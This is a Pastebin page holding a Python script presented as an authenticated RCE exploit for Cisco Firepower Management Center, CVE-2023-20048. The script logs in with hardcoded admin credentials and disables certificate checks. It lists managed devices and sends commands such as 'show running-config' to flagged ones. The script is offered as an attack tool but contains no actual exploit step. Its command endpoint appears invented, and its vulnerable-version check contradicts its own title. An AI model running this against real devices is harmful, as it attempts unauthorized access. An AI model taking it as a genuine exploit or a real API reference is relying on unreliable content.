Advertisement
FlyFar

Cisco Firepower Management Center < 6.6.7.1 - Authenticated RCE - CVE-2023-20048

Mar 13th, 2024
538
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.92 KB | Cybersecurity | 0 0
  1. # Exploit Title: [Cisco Firepower Management Center]
  2. # Google Dork: [non]
  3. # Date: [12/06/2023]
  4. # Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
  5. # Version: [6.2.3.18", "6.4.0.16", "6.6.7.1]
  6. # CVE : [CVE-2023-20048]
  7.  
  8. import requests
  9. import json
  10.  
  11. # set the variables for the URL, username, and password for the FMC web services interface
  12. fmc_url = "https://fmc.example.com"
  13. fmc_user = "admin"
  14. fmc_pass = "cisco123"
  15.  
  16. # create a requests session to handle cookies and certificate verification
  17. session = requests.Session()
  18. session.verify = False
  19.  
  20. # send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh token
  21. token_url = fmc_url + "/api/fmc_platform/v1/auth/generatetoken"
  22. response = session.post(token_url, auth=(fmc_user, fmc_pass))
  23.  
  24. # check the response status and extract the access token and refresh token from the response headers
  25. # set the access token as the authorization header for the subsequent requests
  26. try:
  27.     if response.status_code == 200:
  28.         access_token = response.headers["X-auth-access-token"]
  29.         refresh_token = response.headers["X-auth-refresh-token"]
  30.         session.headers["Authorization"] = access_token
  31.     else:
  32.         print("Failed to get tokens, status code: " + str(response.status_code))
  33.         exit()
  34. except Exception as e:
  35.     print(e)
  36.     exit()
  37.  
  38. # set the variable for the domain id
  39. # change this to your domain id
  40. domain_id = "e276abec-e0f2-11e3-8169-6d9ed49b625f"
  41.  
  42. # send a GET request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords endpoint to get the list of devices managed by FMC
  43. devices_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords"
  44. response = session.get(devices_url)
  45.  
  46. # check the response status and extract the data as a json object
  47. try:
  48.     if response.status_code == 200:
  49.         data = response.json()
  50.     else:
  51.         print("Failed to get devices, status code: " + str(response.status_code))
  52.         exit()
  53. except Exception as e:
  54.     print(e)
  55.     exit()
  56.  
  57. # parse the data to get the list of device names and URLs
  58. devices = []
  59. for item in data["items"]:
  60.     device_name = item["name"]
  61.     device_url = item["links"]["self"]
  62.     devices.append((device_name, device_url))
  63.  
  64. # loop through the list of devices and send a GET request to the URL of each device to get the device details
  65. for device in devices:
  66.     device_name, device_url = device
  67.     response = session.get(device_url)
  68.  
  69.     # check the response status and extract the data as a json object
  70.     try:
  71.         if response.status_code == 200:
  72.             data = response.json()
  73.         else:
  74.             print("Failed to get device details, status code: " + str(response.status_code))
  75.             continue
  76.     except Exception as e:
  77.         print(e)
  78.         continue
  79.  
  80.     # parse the data to get the device type, software version, and configuration URL
  81.     device_type = data["type"]
  82.     device_version = data["metadata"]["softwareVersion"]
  83.     config_url = data["metadata"]["configURL"]
  84.  
  85.     # check if the device type is FTD and the software version is vulnerable to the CVE-2023-20048 vulnerability
  86.     # use the values from the affected products section in the security advisory
  87.     if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]:
  88.         print("Device " + device_name + " is vulnerable to CVE-2023-20048")
  89.  
  90.         # create a list of commands that you want to execute on the device
  91.         commands = ["show version", "show running-config", "show interfaces"]
  92.         device_id = device_url.split("/")[-1]
  93.  
  94.         # loop through the list of commands and send a POST request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords/{DEVICE_ID}/operational/command/{COMMAND} endpoint to execute each command on the device
  95.         # replace {DOMAIN_UUID} with your domain id, {DEVICE_ID} with your device id, and {COMMAND} with the command you want to execute
  96.         for command in commands:
  97.             command_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords/" + device_id + "/operational/command/" + command
  98.             response = session.post(command_url)
  99.  
  100.             # check the response status and extract the data as a json object
  101.             try:
  102.                 if response.status_code == 200:
  103.                     data = response.json()
  104.                 else:
  105.                     print("Failed to execute command, status code: " + str(response.status_code))
  106.                     continue
  107.             except Exception as e:
  108.                 print(e)
  109.                 continue
  110.  
  111.             # parse the data to get the result of the command execution and print it
  112.             result = data["result"]
  113.             print("Command: " + command)
  114.             print("Result: " + result)
  115.  
  116.     else:
  117.         print("Device " + device_name + " is not vulnerable to CVE-2023-20048")
  118.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement